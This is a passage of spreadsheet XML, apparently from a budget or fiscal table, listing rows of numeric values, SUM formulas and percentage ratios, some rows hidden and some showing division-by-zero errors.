    <row r="11" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A11" s="125" t="s">
        <v>1428</v>
      </c>
      <c r="B11" s="126"/>
      <c r="C11" s="126"/>
      <c r="D11" s="126"/>
      <c r="E11" s="126"/>
      <c r="F11" s="105" t="e">
        <f t="shared" si="0"/>
        <v>#DIV/0!</v>
      </c>
      <c r="G11" s="127"/>
    </row>
    <row r="12" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A12" s="125" t="s">
        <v>1429</v>
      </c>
      <c r="B12" s="126">
        <f>SUM(B13:B17)</f>
        <v>0</v>
      </c>
      <c r="C12" s="126">
        <f>SUM(C13:C17)</f>
        <v>0</v>
      </c>
      <c r="D12" s="126">
        <f>SUM(D13:D17)</f>
        <v>0</v>
      </c>
      <c r="E12" s="126">
        <f>SUM(E13:E17)</f>
        <v>0</v>
      </c>
      <c r="F12" s="105" t="e">
        <f t="shared" si="0"/>
        <v>#DIV/0!</v>
      </c>
      <c r="G12" s="127"/>
    </row>
    <row r="13" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A13" s="125" t="s">
        <v>1430</v>
      </c>
      <c r="B13" s="126"/>
      <c r="C13" s="126"/>
      <c r="D13" s="126"/>
      <c r="E13" s="126"/>
      <c r="F13" s="105" t="e">
        <f t="shared" si="0"/>
        <v>#DIV/0!</v>
      </c>
      <c r="G13" s="127"/>
    </row>
    <row r="14" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A14" s="125" t="s">
        <v>1431</v>
      </c>
      <c r="B14" s="126"/>
      <c r="C14" s="126"/>
      <c r="D14" s="126"/>
      <c r="E14" s="126"/>
      <c r="F14" s="105" t="e">
        <f t="shared" si="0"/>
        <v>#DIV/0!</v>
      </c>
      <c r="G14" s="127"/>
    </row>
    <row r="15" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A15" s="125" t="s">
        <v>1432</v>
      </c>
      <c r="B15" s="126"/>
      <c r="C15" s="126"/>
      <c r="D15" s="126"/>
      <c r="E15" s="126"/>
      <c r="F15" s="105" t="e">
        <f t="shared" si="0"/>
        <v>#DIV/0!</v>
      </c>
      <c r="G15" s="127"/>
    </row>
    <row r="16" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A16" s="125" t="s">
        <v>1433</v>
      </c>
      <c r="B16" s="126"/>
      <c r="C16" s="126"/>
      <c r="D16" s="126"/>
      <c r="E16" s="126"/>
      <c r="F16" s="105" t="e">
        <f t="shared" si="0"/>
        <v>#DIV/0!</v>
      </c>
      <c r="G16" s="127"/>
    </row>
    <row r="17" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A17" s="125" t="s">
        <v>1434</v>
      </c>
      <c r="B17" s="126"/>
      <c r="C17" s="126"/>
      <c r="D17" s="126"/>
      <c r="E17" s="126"/>
      <c r="F17" s="105" t="e">
        <f t="shared" si="0"/>
        <v>#DIV/0!</v>
      </c>
      <c r="G17" s="127"/>
    </row>
    <row r="18" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A18" s="125" t="s">
        <v>1435</v>
      </c>
      <c r="B18" s="126">
        <f>SUM(B19:B20)</f>
        <v>0</v>
      </c>
      <c r="C18" s="126">
        <f>SUM(C19:C20)</f>
        <v>0</v>
      </c>
      <c r="D18" s="126">
        <f>SUM(D19:D20)</f>
        <v>0</v>
      </c>
      <c r="E18" s="126">
        <f>SUM(E19:E20)</f>
        <v>0</v>
      </c>
      <c r="F18" s="105" t="e">
        <f t="shared" si="0"/>
        <v>#DIV/0!</v>
      </c>
      <c r="G18" s="127"/>
    </row>
    <row r="19" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A19" s="125" t="s">
        <v>1436</v>
      </c>
      <c r="B19" s="126"/>
      <c r="C19" s="126"/>
      <c r="D19" s="126"/>
      <c r="E19" s="126"/>
      <c r="F19" s="105" t="e">
        <f t="shared" si="0"/>
        <v>#DIV/0!</v>
      </c>
      <c r="G19" s="127"/>
    </row>
    <row r="20" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A20" s="125" t="s">
        <v>1437</v>
      </c>
      <c r="B20" s="126"/>
      <c r="C20" s="126"/>
      <c r="D20" s="126"/>
      <c r="E20" s="126"/>
      <c r="F20" s="105" t="e">
        <f t="shared" si="0"/>
        <v>#DIV/0!</v>
      </c>
      <c r="G20" s="127"/>
    </row>
    <row r="21" spans="1:7" ht="19.5" customHeight="1">
      <c r="A21" s="125" t="s">
        <v>1438</v>
      </c>
      <c r="B21" s="126">
        <f>SUM(B22,B26,B30)</f>
        <v>0</v>
      </c>
      <c r="C21" s="126">
        <f>SUM(C22,C26,C30)</f>
        <v>0</v>
      </c>
      <c r="D21" s="126">
        <v>12524</v>
      </c>
      <c r="E21" s="126">
        <f>SUM(E22,E26,E30)</f>
        <v>0</v>
      </c>
      <c r="F21" s="105"/>
      <c r="G21" s="127"/>
    </row>
    <row r="22" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A22" s="125" t="s">
        <v>1439</v>
      </c>
      <c r="B22" s="126">
        <f>SUM(B23:B25)</f>
        <v>0</v>
      </c>
      <c r="C22" s="126">
        <f>SUM(C23:C25)</f>
        <v>0</v>
      </c>
      <c r="D22" s="126">
        <f>SUM(D23:D25)</f>
        <v>0</v>
      </c>
      <c r="E22" s="126">
        <f>SUM(E23:E25)</f>
        <v>0</v>
      </c>
      <c r="F22" s="105"/>
      <c r="G22" s="127"/>
    </row>
    <row r="23" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A23" s="125" t="s">
        <v>1440</v>
      </c>
      <c r="B23" s="126"/>
      <c r="C23" s="126"/>
      <c r="D23" s="126"/>
      <c r="E23" s="126"/>
      <c r="F23" s="105"/>
      <c r="G23" s="127"/>
    </row>
    <row r="24" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A24" s="125" t="s">
        <v>1441</v>
      </c>
      <c r="B24" s="126"/>
      <c r="C24" s="126"/>
      <c r="D24" s="126"/>
      <c r="E24" s="126"/>
      <c r="F24" s="105"/>
      <c r="G24" s="127"/>
    </row>
    <row r="25" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A25" s="125" t="s">
        <v>1442</v>
      </c>
      <c r="B25" s="126"/>
      <c r="C25" s="126"/>
      <c r="D25" s="126"/>
      <c r="E25" s="126"/>
      <c r="F25" s="105"/>
      <c r="G25" s="127"/>
    </row>
    <row r="26" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A26" s="125" t="s">
        <v>1443</v>
      </c>
      <c r="B26" s="126">
        <f>SUM(B27:B29)</f>
        <v>0</v>
      </c>
      <c r="C26" s="126">
        <f>SUM(C27:C29)</f>
        <v>0</v>
      </c>
      <c r="D26" s="126">
        <f>SUM(D27:D29)</f>
        <v>0</v>
      </c>
      <c r="E26" s="126">
        <f>SUM(E27:E29)</f>
        <v>0</v>
      </c>
      <c r="F26" s="105"/>
      <c r="G26" s="127"/>
    </row>
    <row r="27" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A27" s="125" t="s">
        <v>1440</v>
      </c>
      <c r="B27" s="126"/>
      <c r="C27" s="126"/>
      <c r="D27" s="126"/>
      <c r="E27" s="126"/>
      <c r="F27" s="105"/>
      <c r="G27" s="127"/>
    </row>
    <row r="28" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A28" s="125" t="s">
        <v>1441</v>
      </c>
      <c r="B28" s="126"/>
      <c r="C28" s="126"/>
      <c r="D28" s="126"/>
      <c r="E28" s="126"/>
      <c r="F28" s="105"/>
      <c r="G28" s="127"/>
    </row>
    <row r="29" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A29" s="125" t="s">
        <v>1444</v>
      </c>
      <c r="B29" s="126"/>
      <c r="C29" s="126"/>
      <c r="D29" s="126"/>
      <c r="E29" s="126"/>
      <c r="F29" s="105"/>
      <c r="G29" s="127"/>
    </row>
    <row r="30" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A30" s="125" t="s">
        <v>1445</v>
      </c>
      <c r="B30" s="126">
        <f>SUM(B31:B32)</f>
        <v>0</v>
      </c>
      <c r="C30" s="126">
        <f>SUM(C31:C32)</f>
        <v>0</v>
      </c>
      <c r="D30" s="126">
        <f>SUM(D31:D32)</f>
        <v>0</v>
      </c>
      <c r="E30" s="126">
        <f>SUM(E31:E32)</f>
        <v>0</v>
      </c>
      <c r="F30" s="105"/>
      <c r="G30" s="127"/>
    </row>
    <row r="31" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A31" s="125" t="s">
        <v>1441</v>
      </c>
      <c r="B31" s="126"/>
      <c r="C31" s="126"/>
      <c r="D31" s="126"/>
      <c r="E31" s="126"/>
      <c r="F31" s="105"/>
      <c r="G31" s="127"/>
    </row>
    <row r="32" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A32" s="125" t="s">
        <v>1446</v>
      </c>
      <c r="B32" s="126"/>
      <c r="C32" s="126"/>
      <c r="D32" s="126"/>
      <c r="E32" s="126"/>
      <c r="F32" s="105"/>
      <c r="G32" s="127"/>
    </row>
    <row r="33" spans="1:7" ht="19.5" customHeight="1">
      <c r="A33" s="125" t="s">
        <v>1447</v>
      </c>
      <c r="B33" s="126">
        <f>SUM(B34,B39)</f>
        <v>0</v>
      </c>
      <c r="C33" s="126">
        <f>SUM(C34,C39)</f>
        <v>0</v>
      </c>
      <c r="D33" s="126">
        <f>SUM(D34,D39)</f>
        <v>0</v>
      </c>
      <c r="E33" s="126">
        <f>SUM(E34,E39)</f>
        <v>0</v>
      </c>
      <c r="F33" s="105"/>
      <c r="G33" s="127"/>
    </row>
    <row r="34" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A34" s="125" t="s">
        <v>1448</v>
      </c>
      <c r="B34" s="126">
        <f>SUM(B35:B38)</f>
        <v>0</v>
      </c>
      <c r="C34" s="126">
        <f>SUM(C35:C38)</f>
        <v>0</v>
      </c>
      <c r="D34" s="126">
        <f>SUM(D35:D38)</f>
        <v>0</v>
      </c>
      <c r="E34" s="126">
        <f>SUM(E35:E38)</f>
        <v>0</v>
      </c>
      <c r="F34" s="105" t="e">
        <f t="shared" si="0"/>
        <v>#DIV/0!</v>
      </c>
      <c r="G34" s="127"/>
    </row>
    <row r="35" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A35" s="125" t="s">
        <v>1449</v>
      </c>
      <c r="B35" s="126"/>
      <c r="C35" s="126"/>
      <c r="D35" s="126"/>
      <c r="E35" s="126"/>
      <c r="F35" s="105" t="e">
        <f t="shared" si="0"/>
        <v>#DIV/0!</v>
      </c>
      <c r="G35" s="127"/>
    </row>
    <row r="36" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A36" s="125" t="s">
        <v>1450</v>
      </c>
      <c r="B36" s="126"/>
      <c r="C36" s="126"/>
      <c r="D36" s="126"/>
      <c r="E36" s="126"/>
      <c r="F36" s="105" t="e">
        <f t="shared" si="0"/>
        <v>#DIV/0!</v>
      </c>
      <c r="G36" s="127"/>
    </row>
    <row r="37" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A37" s="125" t="s">
        <v>1451</v>
      </c>
      <c r="B37" s="126"/>
      <c r="C37" s="126"/>
      <c r="D37" s="126"/>
      <c r="E37" s="126"/>
      <c r="F37" s="105" t="e">
        <f t="shared" si="0"/>
        <v>#DIV/0!</v>
      </c>
      <c r="G37" s="127"/>
    </row>
    <row r="38" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A38" s="125" t="s">
        <v>1452</v>
      </c>
      <c r="B38" s="126"/>
      <c r="C38" s="126"/>
      <c r="D38" s="126"/>
      <c r="E38" s="126"/>
      <c r="F38" s="105" t="e">
        <f aca="true" t="shared" si="1" ref="F38:F101">100*D38/B38</f>
        <v>#DIV/0!</v>
      </c>
      <c r="G38" s="125"/>
    </row>
    <row r="39" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A39" s="125" t="s">
        <v>1453</v>
      </c>
      <c r="B39" s="126">
        <f>SUM(B40:B43)</f>
        <v>0</v>
      </c>
      <c r="C39" s="126">
        <f>SUM(C40:C43)</f>
        <v>0</v>
      </c>
      <c r="D39" s="126">
        <f>SUM(D40:D43)</f>
        <v>0</v>
      </c>
      <c r="E39" s="126">
        <f>SUM(E40:E43)</f>
        <v>0</v>
      </c>
      <c r="F39" s="105" t="e">
        <f t="shared" si="1"/>
        <v>#DIV/0!</v>
      </c>
      <c r="G39" s="125"/>
    </row>
    <row r="40" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A40" s="125" t="s">
        <v>1454</v>
      </c>
      <c r="B40" s="126"/>
      <c r="C40" s="126"/>
      <c r="D40" s="126"/>
      <c r="E40" s="126"/>
      <c r="F40" s="105"/>
      <c r="G40" s="127"/>
    </row>
    <row r="41" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A41" s="125" t="s">
        <v>1455</v>
      </c>
      <c r="B41" s="126"/>
      <c r="C41" s="126"/>
      <c r="D41" s="126"/>
      <c r="E41" s="126"/>
      <c r="F41" s="105"/>
      <c r="G41" s="127"/>
    </row>
    <row r="42" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A42" s="125" t="s">
        <v>1456</v>
      </c>
      <c r="B42" s="126"/>
      <c r="C42" s="126"/>
      <c r="D42" s="126"/>
      <c r="E42" s="126"/>
      <c r="F42" s="105"/>
      <c r="G42" s="127"/>
    </row>
    <row r="43" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A43" s="125" t="s">
        <v>1457</v>
      </c>
      <c r="B43" s="126"/>
      <c r="C43" s="126"/>
      <c r="D43" s="126"/>
      <c r="E43" s="126"/>
      <c r="F43" s="105"/>
      <c r="G43" s="127"/>
    </row>
    <row r="44" spans="1:7" ht="19.5" customHeight="1">
      <c r="A44" s="125" t="s">
        <v>1458</v>
      </c>
      <c r="B44" s="126">
        <f>SUM(B45,B58,B62,B63,B69,B73,B77,B81,B87,B90)</f>
        <v>217721</v>
      </c>
      <c r="C44" s="126">
        <f>SUM(C45,C58,C62,C63,C69,C73,C77,C81,C87,C90)</f>
        <v>88770</v>
      </c>
      <c r="D44" s="126">
        <f>SUM(D45,D58,D62,D63,D69,D73,D77,D81,D87,D90)</f>
        <v>340312</v>
      </c>
      <c r="E44" s="126">
        <f>SUM(E45,E58,E62,E63,E69,E73,E77,E81,E87,E90)</f>
        <v>238795</v>
      </c>
      <c r="F44" s="105">
        <f t="shared" si="1"/>
        <v>156.30646561424942</v>
      </c>
      <c r="G44" s="127"/>
    </row>
    <row r="45" spans="1:7" ht="19.5" customHeight="1">
      <c r="A45" s="125" t="s">
        <v>1459</v>
      </c>
      <c r="B45" s="126">
        <f>SUM(B46:B57)</f>
        <v>178797</v>
      </c>
      <c r="C45" s="126">
        <f>SUM(C46:C57)</f>
        <v>74820</v>
      </c>
      <c r="D45" s="126">
        <f>SUM(D46:D57)</f>
        <v>277434</v>
      </c>
      <c r="E45" s="126">
        <f>SUM(E46:E57)</f>
        <v>221255</v>
      </c>
      <c r="F45" s="105">
        <f t="shared" si="1"/>
        <v>155.16703300390947</v>
      </c>
      <c r="G45" s="127"/>
    </row>
    <row r="46" spans="1:7" ht="19.5" customHeight="1">
      <c r="A46" s="125" t="s">
        <v>1460</v>
      </c>
      <c r="B46" s="126">
        <v>50000</v>
      </c>
      <c r="C46" s="126">
        <v>50000</v>
      </c>
      <c r="D46" s="126">
        <f>57800+4700</f>
        <v>62500</v>
      </c>
      <c r="E46" s="126">
        <f>57800+4700</f>
        <v>62500</v>
      </c>
      <c r="F46" s="105">
        <f t="shared" si="1"/>
        <v>125</v>
      </c>
      <c r="G46" s="127"/>
    </row>
    <row r="47" spans="1:7" ht="19.5" customHeight="1">
      <c r="A47" s="125" t="s">
        <v>1461</v>
      </c>
      <c r="B47" s="126"/>
      <c r="C47" s="126"/>
      <c r="D47" s="126"/>
      <c r="E47" s="126"/>
      <c r="F47" s="105"/>
      <c r="G47" s="127"/>
    </row>
    <row r="48" spans="1:7" ht="19.5" customHeight="1">
      <c r="A48" s="125" t="s">
        <v>1462</v>
      </c>
      <c r="B48" s="126"/>
      <c r="C48" s="126"/>
      <c r="D48" s="126"/>
      <c r="E48" s="126"/>
      <c r="F48" s="105"/>
      <c r="G48" s="127"/>
    </row>
    <row r="49" spans="1:7" ht="19.5" customHeight="1">
      <c r="A49" s="125" t="s">
        <v>1463</v>
      </c>
      <c r="B49" s="126"/>
      <c r="C49" s="126"/>
      <c r="D49" s="126"/>
      <c r="E49" s="126"/>
      <c r="F49" s="105"/>
      <c r="G49" s="127"/>
    </row>
    <row r="50" spans="1:7" ht="19.5" customHeight="1">
      <c r="A50" s="125" t="s">
        <v>1464</v>
      </c>
      <c r="B50" s="126"/>
      <c r="C50" s="126"/>
      <c r="D50" s="126"/>
      <c r="E50" s="126"/>
      <c r="F50" s="105"/>
      <c r="G50" s="127"/>
    </row>
    <row r="51" spans="1:7" ht="19.5" customHeight="1">
      <c r="A51" s="125" t="s">
        <v>1465</v>
      </c>
      <c r="B51" s="126">
        <v>1500</v>
      </c>
      <c r="C51" s="126">
        <v>1500</v>
      </c>
      <c r="D51" s="126"/>
      <c r="E51" s="126"/>
      <c r="F51" s="105">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="G51" s="127"/>
    </row>
    <row r="52" spans="1:7" ht="19.5" customHeight="1">
      <c r="A52" s="125" t="s">
        <v>1466</v>
      </c>
      <c r="B52" s="126"/>
      <c r="C52" s="126"/>
      <c r="D52" s="126"/>
      <c r="E52" s="126"/>
      <c r="F52" s="105"/>
      <c r="G52" s="127"/>
    </row>
    <row r="53" spans="1:7" ht="19.5" customHeight="1">
      <c r="A53" s="125" t="s">
        <v>1467</v>
      </c>
      <c r="B53" s="126"/>
      <c r="C53" s="126"/>
      <c r="D53" s="126"/>
      <c r="E53" s="126"/>
      <c r="F53" s="105"/>
      <c r="G53" s="127"/>
    </row>
    <row r="54" spans="1:7" ht="19.5" customHeight="1">
      <c r="A54" s="125" t="s">
        <v>1468</v>
      </c>
      <c r="B54" s="126">
        <v>18550</v>
      </c>
      <c r="C54" s="126">
        <v>18550</v>
      </c>
      <c r="D54" s="126"/>
      <c r="E54" s="126"/>
      <c r="F54" s="105">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="G54" s="127"/>
    </row>
    <row r="55" spans="1:7" ht="19.5" customHeight="1">
      <c r="A55" s="125" t="s">
        <v>1469</v>
      </c>
      <c r="B55" s="126"/>
      <c r="C55" s="126"/>
      <c r="D55" s="126"/>
      <c r="E55" s="126"/>
      <c r="F55" s="105"/>
      <c r="G55" s="127"/>
    </row>
    <row r="56" spans="1:7" ht="19.5" customHeight="1">
      <c r="A56" s="125" t="s">
        <v>1244</v>
      </c>
      <c r="B56" s="126"/>
      <c r="C56" s="126"/>
      <c r="D56" s="126"/>
      <c r="E56" s="126"/>
      <c r="F56" s="105"/>
      <c r="G56" s="127"/>
    </row>
    <row r="57" spans="1:7" ht="19.5" customHeight="1">
      <c r="A57" s="125" t="s">
        <v>1470</v>
      </c>
      <c r="B57" s="126">
        <v>108747</v>
      </c>
      <c r="C57" s="126">
        <v>4770</v>
      </c>
      <c r="D57" s="126">
        <f>194934+20000</f>
        <v>214934</v>
      </c>
      <c r="E57" s="126">
        <f>138755+20000</f>
        <v>158755</v>
      </c>
      <c r="F57" s="105">
        <f t="shared" si="1"/>
        <v>197.6459120711376</v>
      </c>
      <c r="G57" s="127"/>
    </row>
    <row r="58" spans="1:7" ht="19.5" customHeight="1">
      <c r="A58" s="125" t="s">
        <v>1471</v>
      </c>
      <c r="B58" s="126">
        <f>SUM(B59:B61)</f>
        <v>20307</v>
      </c>
      <c r="C58" s="126">
        <f>SUM(C59:C61)</f>
        <v>6500</v>
      </c>
      <c r="D58" s="126">
        <f>SUM(D59:D61)</f>
        <v>33024</v>
      </c>
      <c r="E58" s="126">
        <f>SUM(E59:E61)</f>
        <v>7000</v>
      </c>
      <c r="F58" s="105">
        <f t="shared" si="1"/>
        <v>162.6237258088344</v>
      </c>
      <c r="G58" s="127"/>
    </row>
    <row r="59" spans="1:7" ht="19.5" customHeight="1">
      <c r="A59" s="125" t="s">
        <v>1460</v>
      </c>
      <c r="B59" s="126"/>
      <c r="C59" s="126"/>
      <c r="D59" s="126"/>
      <c r="E59" s="126"/>
      <c r="F59" s="105"/>
      <c r="G59" s="127"/>
    </row>
    <row r="60" spans="1:7" ht="19.5" customHeight="1">
      <c r="A60" s="125" t="s">
        <v>1461</v>
      </c>
      <c r="B60" s="126"/>
      <c r="C60" s="126"/>
      <c r="D60" s="126"/>
      <c r="E60" s="126"/>
      <c r="F60" s="105"/>
      <c r="G60" s="127"/>
    </row>
    <row r="61" spans="1:7" ht="19.5" customHeight="1">
      <c r="A61" s="125" t="s">
        <v>1472</v>
      </c>
      <c r="B61" s="126">
        <v>20307</v>
      </c>
      <c r="C61" s="126">
        <v>6500</v>
      </c>
      <c r="D61" s="126">
        <v>33024</v>
      </c>
      <c r="E61" s="126">
        <v>7000</v>
      </c>
      <c r="F61" s="105">
        <f t="shared" si="1"/>
        <v>162.6237258088344</v>
      </c>
      <c r="G61" s="127"/>
    </row>
    <row r="62" spans="1:8" s="113" customFormat="1" ht="19.5" customHeight="1">
      <c r="A62" s="128" t="s">
        <v>1473</v>
      </c>
      <c r="B62" s="126">
        <v>989</v>
      </c>
      <c r="C62" s="126"/>
      <c r="D62" s="126">
        <f>6458-4700</f>
        <v>1758</v>
      </c>
      <c r="E62" s="126">
        <v>300</v>
      </c>
      <c r="F62" s="129">
        <f t="shared" si="1"/>
        <v>177.75530839231547</v>
      </c>
      <c r="G62" s="130"/>
      <c r="H62" s="131"/>
    </row>
    <row r="63" spans="1:7" ht="19.5" customHeight="1">
      <c r="A63" s="125" t="s">
        <v>1474</v>
      </c>
      <c r="B63" s="126">
        <f>SUM(B64:B68)</f>
        <v>13677</v>
      </c>
      <c r="C63" s="126">
        <f>SUM(C64:C68)</f>
        <v>5500</v>
      </c>
      <c r="D63" s="126">
        <f>SUM(D64:D68)</f>
        <v>23872</v>
      </c>
      <c r="E63" s="126">
        <f>SUM(E64:E68)</f>
        <v>8240</v>
      </c>
      <c r="F63" s="105">
        <f t="shared" si="1"/>
        <v>174.54120055567742</v>
      </c>
      <c r="G63" s="127"/>
    </row>
    <row r="64" spans="1:7" ht="19.5" customHeight="1">
      <c r="A64" s="125" t="s">
        <v>1475</v>
      </c>
      <c r="B64" s="126"/>
      <c r="C64" s="126"/>
      <c r="D64" s="126"/>
      <c r="E64" s="126"/>
      <c r="F64" s="105"/>
      <c r="G64" s="127"/>
    </row>
    <row r="65" spans="1:7" ht="19.5" customHeight="1">
      <c r="A65" s="125" t="s">
        <v>1476</v>
      </c>
      <c r="B65" s="126"/>
      <c r="C65" s="126"/>
      <c r="D65" s="126"/>
      <c r="E65" s="126"/>
      <c r="F65" s="105"/>
      <c r="G65" s="127"/>
    </row>
    <row r="66" spans="1:7" ht="19.5" customHeight="1">
      <c r="A66" s="125" t="s">
        <v>1477</v>
      </c>
      <c r="B66" s="126"/>
      <c r="C66" s="126"/>
      <c r="D66" s="126"/>
      <c r="E66" s="126"/>
      <c r="F66" s="105"/>
      <c r="G66" s="127"/>
    </row>
    <row r="67" spans="1:7" ht="19.5" customHeight="1">
      <c r="A67" s="125" t="s">
        <v>1478</v>
      </c>
      <c r="B67" s="126"/>
      <c r="C67" s="126"/>
      <c r="D67" s="126"/>
      <c r="E67" s="126"/>
      <c r="F67" s="105"/>
      <c r="G67" s="127"/>
    </row>
    <row r="68" spans="1:7" ht="19.5" customHeight="1">
      <c r="A68" s="125" t="s">
        <v>1479</v>
      </c>
      <c r="B68" s="126">
        <v>13677</v>
      </c>
      <c r="C68" s="126">
        <v>5500</v>
      </c>
      <c r="D68" s="126">
        <v>23872</v>
      </c>
      <c r="E68" s="126">
        <v>8240</v>
      </c>
      <c r="F68" s="105">
        <f t="shared" si="1"/>
        <v>174.54120055567742</v>
      </c>
      <c r="G68" s="127"/>
    </row>
    <row r="69" spans="1:7" ht="19.5" customHeight="1">
      <c r="A69" s="125" t="s">
        <v>1480</v>
      </c>
      <c r="B69" s="126">
        <f>SUM(B70:B72)</f>
        <v>3951</v>
      </c>
      <c r="C69" s="126">
        <f>SUM(C70:C72)</f>
        <v>1950</v>
      </c>
      <c r="D69" s="126">
        <f>SUM(D70:D72)</f>
        <v>4224</v>
      </c>
      <c r="E69" s="126">
        <f>SUM(E70:E72)</f>
        <v>2000</v>
      </c>
      <c r="F69" s="105">
        <f t="shared" si="1"/>
        <v>106.90964312832195</v>
      </c>
      <c r="G69" s="127"/>
    </row>
    <row r="70" spans="1:7" ht="19.5" customHeight="1">
      <c r="A70" s="125" t="s">
        <v>1481</v>
      </c>
      <c r="B70" s="126"/>
      <c r="C70" s="126"/>
      <c r="D70" s="126"/>
      <c r="E70" s="126"/>
      <c r="F70" s="105"/>
      <c r="G70" s="127"/>
    </row>
    <row r="71" spans="1:7" ht="19.5" customHeight="1">
      <c r="A71" s="125" t="s">
        <v>1482</v>
      </c>
      <c r="B71" s="126"/>
      <c r="C71" s="126"/>
      <c r="D71" s="126"/>
      <c r="E71" s="126"/>
      <c r="F71" s="105"/>
      <c r="G71" s="127"/>
    </row>
    <row r="72" spans="1:7" ht="19.5" customHeight="1">
      <c r="A72" s="125" t="s">
        <v>1483</v>
      </c>
      <c r="B72" s="126">
        <v>3951</v>
      </c>
      <c r="C72" s="126">
        <v>1950</v>
      </c>
      <c r="D72" s="126">
        <v>4224</v>
      </c>
      <c r="E72" s="126">
        <v>2000</v>
      </c>
      <c r="F72" s="105">
        <f t="shared" si="1"/>
        <v>106.90964312832195</v>
      </c>
      <c r="G72" s="127"/>
    </row>
    <row r="73" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A73" s="125" t="s">
        <v>1484</v>
      </c>
      <c r="B73" s="126">
        <f>SUM(B74:B76)</f>
        <v>0</v>
      </c>
      <c r="C73" s="126">
        <f>SUM(C74:C76)</f>
        <v>0</v>
      </c>
      <c r="D73" s="126">
        <f>SUM(D74:D76)</f>
        <v>0</v>
      </c>
      <c r="E73" s="126">
        <f>SUM(E74:E76)</f>
        <v>0</v>
      </c>
      <c r="F73" s="105" t="e">
        <f t="shared" si="1"/>
        <v>#DIV/0!</v>
      </c>
      <c r="G73" s="127"/>
    </row>
    <row r="74" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A74" s="125" t="s">
        <v>1460</v>
      </c>
      <c r="B74" s="126"/>
      <c r="C74" s="126"/>
      <c r="D74" s="126"/>
      <c r="E74" s="126"/>
      <c r="F74" s="105" t="e">
        <f t="shared" si="1"/>
        <v>#DIV/0!</v>
      </c>
      <c r="G74" s="127"/>
    </row>
    <row r="75" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A75" s="125" t="s">
        <v>1461</v>
      </c>
      <c r="B75" s="126"/>
      <c r="C75" s="126"/>
      <c r="D75" s="126"/>
      <c r="E75" s="126"/>
      <c r="F75" s="105" t="e">
        <f t="shared" si="1"/>
        <v>#DIV/0!</v>
      </c>
      <c r="G75" s="127"/>
    </row>
    <row r="76" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A76" s="125" t="s">
        <v>1485</v>
      </c>
      <c r="B76" s="126"/>
      <c r="C76" s="126"/>
      <c r="D76" s="126"/>
      <c r="E76" s="126"/>
      <c r="F76" s="105" t="e">
        <f t="shared" si="1"/>
        <v>#DIV/0!</v>
      </c>
      <c r="G76" s="127"/>
    </row>
    <row r="77" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A77" s="125" t="s">
        <v>1486</v>
      </c>
      <c r="B77" s="126">
        <f>SUM(B78:B80)</f>
        <v>0</v>
      </c>
      <c r="C77" s="126">
        <f>SUM(C78:C80)</f>
        <v>0</v>
      </c>
      <c r="D77" s="126">
        <f>SUM(D78:D80)</f>
        <v>0</v>
      </c>
      <c r="E77" s="126">
        <f>SUM(E78:E80)</f>
        <v>0</v>
      </c>
      <c r="F77" s="105" t="e">
        <f t="shared" si="1"/>
        <v>#DIV/0!</v>
      </c>
      <c r="G77" s="127"/>
    </row>
    <row r="78" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A78" s="125" t="s">
        <v>1460</v>
      </c>
      <c r="B78" s="126"/>
      <c r="C78" s="126"/>
      <c r="D78" s="126"/>
      <c r="E78" s="126"/>
      <c r="F78" s="105" t="e">
        <f t="shared" si="1"/>
        <v>#DIV/0!</v>
      </c>
      <c r="G78" s="127"/>
    </row>
    <row r="79" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A79" s="125" t="s">
        <v>1461</v>
      </c>
      <c r="B79" s="126"/>
      <c r="C79" s="126"/>
      <c r="D79" s="126"/>
      <c r="E79" s="126"/>
      <c r="F79" s="105" t="e">
        <f t="shared" si="1"/>
        <v>#DIV/0!</v>
      </c>
      <c r="G79" s="127"/>
    </row>
    <row r="80" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A80" s="125" t="s">
        <v>1487</v>
      </c>
      <c r="B80" s="126"/>
      <c r="C80" s="126"/>
      <c r="D80" s="126"/>
      <c r="E80" s="126"/>
      <c r="F80" s="105" t="e">
        <f t="shared" si="1"/>
        <v>#DIV/0!</v>
      </c>
      <c r="G80" s="127"/>
    </row>
    <row r="81" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A81" s="125" t="s">
